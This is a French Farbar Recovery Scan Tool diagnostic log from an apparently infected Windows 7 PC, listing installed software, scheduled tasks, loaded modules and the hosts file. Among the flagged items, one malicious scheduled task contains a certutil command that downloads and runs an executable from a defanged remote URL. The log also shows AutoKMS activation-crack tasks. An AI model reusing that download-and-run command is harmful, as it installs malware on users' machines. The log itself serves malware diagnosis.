Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x64) Version: 24.10.2018 Exécuté par dali (27-10-2018 10:46:25) Exécuté depuis C:\Users\dali\Desktop Windows 7 Professional (X64) (2016-07-29 11:40:53) Mode d'amorçage: Normal ========================================================== ==================== Comptes: ============================= Administrateur (S-1-5-21-3829782650-282456332-2724967173-500 - Administrator - Disabled) dali (S-1-5-21-3829782650-282456332-2724967173-1000 - Administrator - Enabled) => C:\Users\dali HomeGroupUser$ (S-1-5-21-3829782650-282456332-2724967173-1005 - Limited - Enabled) Invité (S-1-5-21-3829782650-282456332-2724967173-501 - Limited - Enabled) ==================== Centre de sécurité ======================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.) AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Programmes installés ====================== (Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.) Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.127 - Adobe Systems Incorporated) Adobe Reader 9.4.0 (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-A94000000001}) (Version: 9.4.0 - Adobe Systems Incorporated) Anvi Folder Locker 1.2.1370.0 (HKLM-x32\...\Anvi Folder Locker) (Version: 1.2.1370.0 - Anvisoft) Ashampoo Burning Studio 2016 (HKLM-x32\...\{91B33C97-B4A4-B41A-6B97-C62C82CEB6A9}_is1) (Version: 16.0.2 - Ashampoo GmbH & Co. KG) CloudNet (HKU\S-1-5-21-3829782650-282456332-2724967173-1000\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION Crystal Reports 10 (HKLM-x32\...\{A0DB4D2C-E85B-4C23-A4F2-F1B95D3C3BE8}) (Version: 10.0.0.53327 - Crystal Decisions, Inc.) Crystal Reports Basic for Visual Studio 2008 (HKLM-x32\...\{AA467959-A1D6-4F45-90CD-11DC57733F32}) (Version: 10.5.0.0 - Business Objects) Crystal Reports Basic Runtime for Visual Studio 2008 (x64) (HKLM\...\{2BFA9B05-7418-4EDE-A6FC-620427BAAAA3}) (Version: 10.5.0.0 - Business Objects) EVEREST Home Edition v2.20 (HKLM-x32\...\EVEREST Home Edition_is1) (Version: 2.20 - Lavalys Inc) FastStone Capture 8.2 (HKLM-x32\...\FastStone Capture) (Version: 8.2 - FastStone Soft) Fingerprint Reader Driver 2.2.3 (HKLM-x32\...\Fingerprint Reader Driver_is1) (Version: - Company) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 69.0.3497.100 - Google Inc.) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.17 - Google Inc.) Hidden Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.21.115 - Google Inc.) Hidden Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.0.1204 - Intel Corporation) Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 3.0.1.41 - Intel Corporation) Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version: - Tonec Inc.) K-Lite Codec Pack 6.4.0 (Full) (HKLM-x32\...\KLiteCodecPack_is1) (Version: 6.4.0 - ) Microsoft .NET Compact Framework 2.0 SP2 (HKLM-x32\...\{EDDF99D9-9FE3-4871-A7DB-D1522C51EE9A}) (Version: 2.0.7045 - Microsoft Corporation) Microsoft .NET Compact Framework 3.5 (HKLM-x32\...\{291B3A3B-F808-45B8-8113-DF232FCB6C82}) (Version: 3.5.7283 - Microsoft Corporation) Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation) Microsoft Device Emulator (64 bit) version 3.0 - ENU (HKLM\...\{EF8B1A2E-9CCB-3AB2-91E3-4EEDAB1294E1}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Document Explorer 2008 (HKLM-x32\...\Microsoft Document Explorer 2008) (Version: - Microsoft Corporation) Microsoft ODBC Driver 11 for SQL Server (HKLM\...\{0A1391C9-AD99-4622-9A4D-973A99AFBEA2}) (Version: 12.1.4219.0 - Microsoft Corporation) Microsoft Office Professionnel Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4763.1000 - Microsoft Corporation) Microsoft Visual Basic 6.0 Enterprise Edition (HKLM-x32\...\Visual Basic 6.0 Enterprise Edition) (Version: - ) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual Studio Web Authoring Component (HKLM-x32\...\VisualWebDeveloper) (Version: 12.0.4518.1066 - Microsoft Corporation) Mobile Broadband HL Service (HKLM-x32\...\Mobile Broadband HL Service) (Version: 22.001.26.01.03 - Huawei Technologies Co.,Ltd) Mobogenie3 (HKLM-x32\...\Mobogenie3) (Version: 3.3.5.45783 - Mobogenie.com) <==== ATTENTION Mozilla Firefox 47.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 47.0.2 (x86 en-US)) (Version: 47.0.2 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 47.0.2.6148 - Mozilla) MSVC80_x64 (HKLM\...\{68660049-8D48-427C-9FF7-139D8340CDC0}) (Version: 1.0.1.0 - Nokia) Hidden MSVC80_x86 (HKLM-x32\...\{212748BB-0DA5-46DE-82A1-403736DC9F27}) (Version: 1.0.1.0 - Nokia) Hidden MSVC90_x64 (HKLM\...\{AB071C8B-873C-459F-ACA9-9EBE03C3E89B}) (Version: 1.0.1.2 - Nokia) Hidden MSVC90_x86 (HKLM-x32\...\{AF111648-99A1-453E-81DD-80DBBF6DAD0D}) (Version: 1.0.1.2 - Nokia) Hidden Nokia Connectivity Cable Driver (HKLM-x32\...\{A57025CC-5F2E-4D01-B387-06DB10500D43}) (Version: 7.1.78.0 - Nokia) NVIDIA Logiciel système PhysX 9.10.0514 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.10.0514 - NVIDIA Corporation) NVIDIA Pilote 3D Vision 260.89 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 260.89 - NVIDIA Corporation) NVIDIA Pilote graphique 260.89 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 260.89 - NVIDIA Corporation) Outil de téléchargement USB/DVD Windows 7 (HKLM-x32\...\{5F8683B5-5056-411C-B808-B289E29E9BBB}) (Version: 1.0.30 - Microsoft Corporation) Package de pilotes Windows - Condor (gnusbnet) Net (11/11/2013 1.2.0.0) (HKLM\...\350179D4FEEF8D83146365E4FD7427A21F5D955A) (Version: 11/11/2013 1.2.0.0 - Condor) Package de pilotes Windows - Condor Communication Equipment Co.,Ltd. (gnusbser) Modem (11/11/2013 1.2.0.0) (HKLM\...\FD4B3DDA263F0DD0154678E963EE8341AB29EAFE) (Version: 11/11/2013 1.2.0.0 - Condor Communication Equipment Co.,Ltd.) Package de pilotes Windows - Condor Communication Equipment Co.,Ltd. (gnusbser) Ports (11/11/2013 1.2.0.0) (HKLM\...\760ECD7B4391C69CC34B300D57CAAE1D7BF4D16B) (Version: 11/11/2013 1.2.0.0 - Condor Communication Equipment Co.,Ltd.) Package de pilotes Windows - Condor Corporation Net (11/11/2013 1.2.0.0) (HKLM\...\E304C591E3B27BA4FEDE756A7033259C81448FE5) (Version: 11/11/2013 1.2.0.0 - Condor Corporation) Package de pilotes Windows - MediaTek Inc. (usbser) Ports (01/05/2012 2.0000.0.1) (HKLM\...\49D9ABA9270C5BDFD7AE1BEB607D36B26BB90235) (Version: 01/05/2012 2.0000.0.1 - MediaTek Inc.) Package de pilotes Windows - MediaTek Inc. (usbser) Ports (12/24/2011 2.0000.0.0) (HKLM\...\D0E6296D177F42BB31C0200E49412003DB6C4633) (Version: 12/24/2011 2.0000.0.0 - MediaTek Inc.) Package de pilotes Windows - Microsoft (WUDFRd) WPD (11/11/2013 1.2.0.0) (HKLM\...\0DB207BF709605C62C08D44DD3A953D00A924560) (Version: 11/11/2013 1.2.0.0 - Microsoft) Package de pilotes Windows - Nokia Modem (05/22/2008 3.8) (HKLM\...\C5A76DC11BABDA0A881E7BE8DDEB641365A77FFD) (Version: 05/22/2008 3.8 - Nokia) Package de pilotes Windows - Nokia Modem (05/22/2008 7.00.0.1) (HKLM\...\9CD348AE9C64C4B939B624E8E24F3903EFDFC82B) (Version: 05/22/2008 7.00.0.1 - Nokia) Package de pilotes Windows - Nokia pccsmcfd LegacyDriver (05/31/2012 7.1.2.0) (HKLM\...\62BBD193ADFDBB228C7E1ADB56463F5732FF7F6F) (Version: 05/31/2012 7.1.2.0 - Nokia) Package de pilotes Windows - SPA Condor Electronics (WinUSB) AndroidUsbDeviceClass (11/11/2013 1.2.0.0) (HKLM\...\EA52A0024D67167EA2BC865080C775727661BB60) (Version: 11/11/2013 1.2.0.0 - SPA Condor Electronics) Panneau de configuration NVIDIA 260.89 (HKLM\...\{B2FE1952-0186-46c3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 260.89 - NVIDIA Corporation) Hidden Perfect Uninstaller v6.3.3.9 (HKLM\...\Perfect Uninstaller_is1) (Version: - www.PerfectUninstaller.com) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.73.618.2013 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6878 - Realtek Semiconductor Corp.) RemoteComms driver (HKLM-x32\...\{43BEEE26-01A8-4EEE-8632-2353261E3B55}) (Version: 1.25.0000 - Oxford Semiconductor) TeraCopy 2.27 (HKLM\...\TeraCopy_is1) (Version: - Code Sector) VistaBootPRO 3.3 (HKLM-x32\...\{6C9FA746-8759-4040-A436-42922CB3492E}) (Version: 3.3.0 - PROnetworks) Visual Studio .NET Prerequisites - English (HKLM\...\{D3E39E77-0EB4-36FB-B97A-8C8AB21B9A45}) (Version: 9.0.21022 - Microsoft Corporation) Visual Studio 2005 Tools pour Office Second Edition Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation) Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual Studio Tools for the Office system 3.0 Runtime) (Version: - Microsoft Corporation) Windows 7 USB/DVD Download Tool (HKLM-x32\...\{CCF298AF-9CE1-4B26-B251-486E98A34789}) (Version: 1.0.30 - Microsoft Corporation) Windows Mobile 5.0 SDK R2 for Pocket PC (HKLM-x32\...\{6C9F6D23-E9AD-43C9-B43A-011562AAF876}) (Version: 5.00.1700.5.14343.06 - Microsoft Corporation) Windows Mobile 5.0 SDK R2 for Smartphone (HKLM-x32\...\{9656F3AC-6BA9-43F0-ABED-F214B5DAB27B}) (Version: 5.00.1700.5.14343.06 - Microsoft Corporation) WinRAR archiver (HKLM-x32\...\WinRAR archiver) (Version: - ) Xilisoft Video Converter Ultimate (HKLM-x32\...\Xilisoft Video Converter Ultimate) (Version: 5.1.17.1107 - Xilisoft) Your Uninstaller! 7 (HKLM-x32\...\YU2010_is1) (Version: 7.5.2014.3 - URSoft, Inc.) YT Downloader 4 (HKLM-x32\...\YT Downloader_is1) (Version: - Youtomato) ==================== Personnalisé CLSID (Avec liste blanche): ========================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) ShellIconOverlayIdentifiers: [ IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2012-02-08] (Tonec Inc.) ShellIconOverlayIdentifiers: [..AFPOverlay] -> {DE0FD55D-8EDC-4F4B-A396-97D9A0117276} => C:\Program Files (x86)\Anvisoft\Anvi Folder Locker\x64\PwdHelper64.dll [2015-04-24] (AnviSoft.com) ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier ShellIconOverlayIdentifiers: [IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2012-02-08] (Tonec Inc.) ContextMenuHandlers1: [AFPMenu] -> {A99A80A9-C66D-4848-AC5D-4804323868A8} => C:\Program Files (x86)\Anvisoft\Anvi Folder Locker\x64\PwdHelper64.dll [2015-04-24] (AnviSoft.com) ContextMenuHandlers1: [TeraCopy] -> {A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt.dll [2011-10-26] () ContextMenuHandlers1: [TeraCopyS64] -> {A764EEF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt64.dll [2011-10-26] () ContextMenuHandlers1-x32: [Uninstall] -> {84058084-7609-44D1-B3CC-7A9436CB6D92} => C:\Program Files\Perfect Uninstaller\Contextmenu.dll [2010-06-13] () ContextMenuHandlers1-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2006-12-11] () ContextMenuHandlers1-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2007-09-20] () ContextMenuHandlers1-x32-x32: [Youtomato.YTConverter] -> {3A0058EA-C412-4426-8EF7-50C39B4DD51D} => C:\Program Files (x86)\Youtomato\YT Downloader\YTC_WS.dll [2016-09-17] (Youtomato) ContextMenuHandlers1-x32-x32: [Youtomato.YTPlayer] -> {0C671AE6-FB74-4582-AF90-3ABF895450B7} => C:\Program Files (x86)\Youtomato\YT Downloader\YTP_WS.dll [2016-09-16] (Youtomato) ContextMenuHandlers2: [AFPMenu] -> {A99A80A9-C66D-4848-AC5D-4804323868A8} => C:\Program Files (x86)\Anvisoft\Anvi Folder Locker\x64\PwdHelper64.dll [2015-04-24] (AnviSoft.com) ContextMenuHandlers2: [TeraCopy] -> {A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt.dll [2011-10-26] () ContextMenuHandlers2: [TeraCopyS64] -> {A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt.dll [2011-10-26] () ContextMenuHandlers4: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => -> Pas de fichier ContextMenuHandlers4: [TeraCopy] -> {A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt.dll [2011-10-26] () ContextMenuHandlers4: [TeraCopyS64] -> {A764EEF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt64.dll [2011-10-26] () ContextMenuHandlers4-x32: [Uninstall] -> {84058084-7609-44D1-B3CC-7A9436CB6D92} => C:\Program Files\Perfect Uninstaller\Contextmenu.dll [2010-06-13] () ContextMenuHandlers4-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2006-12-11] () ContextMenuHandlers4-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2007-09-20] () ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2010-10-08] (NVIDIA Corporation) ContextMenuHandlers5: [TeraCopy] -> {A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt.dll [2011-10-26] () ContextMenuHandlers5: [TeraCopyS64] -> {A764EEF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt64.dll [2011-10-26] () ContextMenuHandlers6: [AFPMenu] -> {A99A80A9-C66D-4848-AC5D-4804323868A8} => C:\Program Files (x86)\Anvisoft\Anvi Folder Locker\x64\PwdHelper64.dll [2015-04-24] (AnviSoft.com) ContextMenuHandlers6: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => -> Pas de fichier ContextMenuHandlers6: [TeraCopy] -> {A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt.dll [2011-10-26] () ContextMenuHandlers6: [TeraCopyS64] -> {A764EEF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt64.dll [2011-10-26] () ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2006-12-11] () ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2007-09-20] () ContextMenuHandlers6-x32: [Youtomato.YTConverter] -> {3A0058EA-C412-4426-8EF7-50C39B4DD51D} => C:\Program Files (x86)\Youtomato\YT Downloader\YTC_WS.dll [2016-09-17] (Youtomato) ContextMenuHandlers6-x32: [Youtomato.YTPlayer] -> {0C671AE6-FB74-4582-AF90-3ABF895450B7} => C:\Program Files (x86)\Youtomato\YT Downloader\YTP_WS.dll [2016-09-16] (Youtomato) ==================== Tâches planifiées (Avec liste blanche) ============= (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) Task: {0BE3C86E-9B5C-4618-8D08-4C4868F225B5} - System32\Tasks\{B03B2CFE-8C4A-4C17-BB86-70E46DD60074} => C:\Windows\system32\pcalua.exe -a G:\listIP\Package\Support\SETUP.EXE -d G:\listIP\Package\Support Task: {1817DFE5-92AA-4C58-858F-1853DF5F2383} - System32\Tasks\{00396DF7-42C6-4FBA-A7DE-45D092572D55} => E:\dali\programmes\Visual Basic 6.0 Enterprise Edition Full\Visual Basic 6.0 Enterprise Edition\SETUP.EXE Task: {1BB4DDA3-F6A0-4283-B7F1-E0AC47012084} - System32\Tasks\{2C5FE435-6923-4F66-A707-179056A9EF12} => C:\Windows\system32\pcalua.exe -a C:\Users\dali\Downloads\wba1590002.exe -d C:\Users\dali\Downloads Task: {1D34C92D-AC27-437B-A199-908147F20EFD} - System32\Tasks\{6D053946-EAC5-4862-BAE9-5318CC436F59} => C:\Windows\system32\pcalua.exe -a "C:\Users\dali\Desktop\sauv rami\dossier rami\sqlserver\devtools\samples\odbc\unzip_odbc.exe" -d "C:\Users\dali\Desktop\sauv rami\dossier rami\sqlserver\devtools\samples\odbc" Task: {219ADD28-D2EF-4893-86CC-AB6DAE0F587F} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-10-16] () <==== ATTENTION Task: {3A4250D2-5B60-4123-A014-A4F9EC3355BE} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://speedandmusic.com/app/app.exe C:\Users\dali\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\dali\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION Task: {44B918A6-3205-414D-8E11-BFDD79540D25} - System32\Tasks\AutoKMSCustom => C:\WINDOWS\AutoKMS\AutoKMS.exe [2016-10-10] () Task: {5078973A-F296-4512-B4BC-364208706A6B} - System32\Tasks\{7E77DF23-CF7C-4842-BC8F-290346F712B0} => C:\Program Files\AVAST Software\Avast\AvastUI.exe Task: {5A15E60F-6830-48A4-BB6D-6CFCF62DF357} - System32\Tasks\{10F38A84-E9CE-419A-9629-7DDC2551C31A} => E:\dali\programmes\Visual Basic 6.0 Enterprise Edition Full\Visual Basic 6.0 Enterprise Edition\SETUP.EXE Task: {681FEE53-12B3-49B5-8EFC-556BBDB6889F} - System32\Tasks\{15AB80F8-0D2D-42D9-8B2A-6423F332159A} => C:\Windows\system32\pcalua.exe -a "C:\Program Files\AVAST Software\Avast\aswRunDll.exe" -c "C:\Program Files\AVAST Software\Avast\Setup\setiface.dll" RunSetup Task: {6E812068-FB92-44F0-934C-319DD648948C} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe Task: {77E1C498-10E3-4360-9CC9-581FA98F47E1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-01] (Google Inc.) Task: {77FA166E-A1BE-42F1-AC58-797050EA516A} - System32\Tasks\{AE594497-517D-4F60-AF51-D5ADC11555AC} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\Zootrax\uninstall.exe" -c shuz -f "C:\Program Files (x86)\Common Files\Zootrax\uninstall.dat" -a uninstallme 69E4BE25-9432-4D4A-B0D1-8E8210A9B172 DeviceId=113d79b8-a429-1880-e2bd-591f889849fc BarcodeId=50027003 ChannelId=3 DistributerName=APSnapdoAMRev Task: {781A14FA-D2D3-4444-80F7-64F0B465696A} - System32\Tasks\{BDB5B09C-7EC0-425E-8CB3-A89F07F490D2} => C:\Windows\system32\pcalua.exe -a "C:\Users\dali\Desktop\sauv rami\fichier instal evaluation\setup.exe" -d "C:\Users\dali\Desktop\sauv rami\fichier instal evaluation" Task: {A63786A1-F07C-49E8-80E0-D98FCED5654A} - System32\Tasks\{16BCB556-01D2-45B3-8E4D-AE0ACFC26A61} => E:\dali\programmes\Visual Basic 6.0 Enterprise Edition Full\Visual Basic 6.0 Enterprise Edition\SETUP.EXE Task: {AE2C4FCC-FE14-490E-A68B-22AA245F1817} - System32\Tasks\{3478E64F-C54B-47CC-AAD6-72E1D2BADDEC} => C:\dev6\BIN\ifrun60.EXE [2004-04-06] (Oracle Corporation) Task: {CB0726F6-17AF-4A7A-9AC7-FDE39FB1AB32} - System32\Tasks\{5138B263-EE8D-4328-A845-705104A0F853} => C:\Windows\system32\pcalua.exe -a C:\WINDOWS\st6unst.exe -c -n "C:\Program Files (x86)\Project1\ST6UNST.LOG" Task: {D8687EB3-E419-4581-BAC9-FF6507C4513C} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-03-14] (Adobe Systems Incorporated) Task: {DE50A27B-6E21-4E39-8A4C-60E26B4FD992} - System32\Tasks\{C42082EC-16D1-49D2-8B56-D337AF237618} => C:\Windows\system32\pcalua.exe -a "C:\Users\dali\Desktop\Recover My Files\Recover My Files\recover my files data recovery software setup.exe" -d "C:\Users\dali\Desktop\Recover My Files\Recover My Files" Task: {E4A488D0-A348-4E98-8257-49EDAB1D0B9B} - System32\Tasks\{97BA8AC3-424C-4FEF-A98D-1D895000D3A2} => msiexec.exe /package "F:\wAIKX86.msi" Task: {E4D88508-3E8F-464E-9552-7F26F2D608A1} - System32\Tasks\{B6CBCCB0-DE19-4163-9133-EB19B171C873} => C:\Windows\system32\pcalua.exe -a C:\Users\dali\Desktop\SlUSB2000Install.exe -d C:\Users\dali\Desktop Task: {EB95A821-5058-4207-AFB6-5586070EA1D6} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe [2016-10-10] () Task: {FFD1640B-1C65-4A99-BB84-E2C3088101FB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-01] (Google Inc.) (Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.) Task: C:\Windows\Tasks\AutoKMS.job => C:\WINDOWS\AutoKMS\AutoKMS.exe ==================== Raccourcis & WMI ======================== (Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.) ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --new-window ==================== Modules chargés (Avec liste blanche) ============== 2016-10-03 11:09 - 2014-08-20 08:27 - 000242256 _____ () C:\ProgramData\MobileBrServ\mbbservice.exe 2010-01-30 01:40 - 2010-01-30 01:40 - 004254560 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF 2016-08-01 12:01 - 2006-12-11 01:14 - 000043008 _____ () C:\Program Files (x86)\WinRAR\rarext64.dll 2016-08-24 12:37 - 2011-10-26 17:41 - 000318976 _____ () C:\Program Files\TeraCopy\TeraCopyExt64.dll 2015-05-28 03:20 - 2015-05-28 03:20 - 000105152 _____ () C:\Program Files (x86)\Mobogenie3\MoboGenieHelper.exe 2018-10-16 13:26 - 2018-10-16 13:26 - 004223488 _____ () C:\Windows\rss\csrss.exe 2018-10-27 11:42 - 2018-10-27 11:42 - 001435136 ____H () C:\Windows\windefender.exe 2015-05-28 03:20 - 2015-05-28 03:20 - 000057536 _____ () C:\Program Files (x86)\Mobogenie3\MGCommon.dll 2013-04-03 18:09 - 2013-04-03 18:09 - 004300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF 2017-02-02 10:08 - 2017-02-01 10:01 - 001870168 _____ () C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.87\libglesv2.dll 2017-02-02 10:08 - 2017-02-01 10:01 - 000085848 _____ () C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.87\libegl.dll ==================== Alternate Data Streams (Avec liste blanche) ========= (Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.) AlternateDataStreams: C:\ProgramData\TEMP:1CE11B51 [152] ==================== Mode sans échec (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.) ==================== Association (Avec liste blanche) =============== (Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.) ==================== Internet Explorer sites de confiance/sensibles =============== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.) ==================== Hosts contenu: ========================== (Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.) 2009-07-14 03:34 - 2017-02-07 17:11 - 000001299 _____ C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 sa.windows.com 127.0.0.1 se.windows.com 127.0.0.1 ie.search.msn.com 127.0.0.1 wustat.windows.com 127.0.0.1 wutrack.windows.com 127.0.0.1 down.baidu2016.com 127.0.0.1 123.sogou.com 127.0.0.1 www.czzsyzgm.com 127.0.0.1 www.czzsyzxl.com 127.0.0.1 union.baidu2019.com 127.0.0.1 genuine.microsoft.com 127.0.0.1 mpa.one.microsoft.com 127.0.0.1 catalog.microsoft.com 127.0.0.1 sls.microsoft.com ==================== Autres zones ============================ (Actuellement, il n'y a pas de correction automatique pour cette section.) HKU\S-1-5-21-3829782650-282456332-2724967173-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\dali\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 8.8.8.8 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Le Pare-feu est activé. ==================== MSCONFIG/TASK MANAGER éléments désactivés == Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé. ==================== RèglesPare-feu (Avec liste blanche) =============== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [TCP Query User{AB78D4FC-E367-4480-8E3F-BB75258E2245}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe FirewallRules: [UDP Query User{6DB6D97B-7A91-4E8E-8F5B-CB4CE347D4CD}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe FirewallRules: [{EF53907C-E8EF-4728-BA69-57F1B748B416}] => (Block) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe FirewallRules: [{7C5BE91D-7FB2-4C6D-A84F-2F9E51B076ED}] => (Block) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe FirewallRules: [{926AB103-52D9-4362-9E29-D9B12D90EDA1}] => (Allow) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe FirewallRules: [{1ABCE4B7-F303-4FB9-B716-C3D5D3F30926}] => (Allow) C:\Program Files 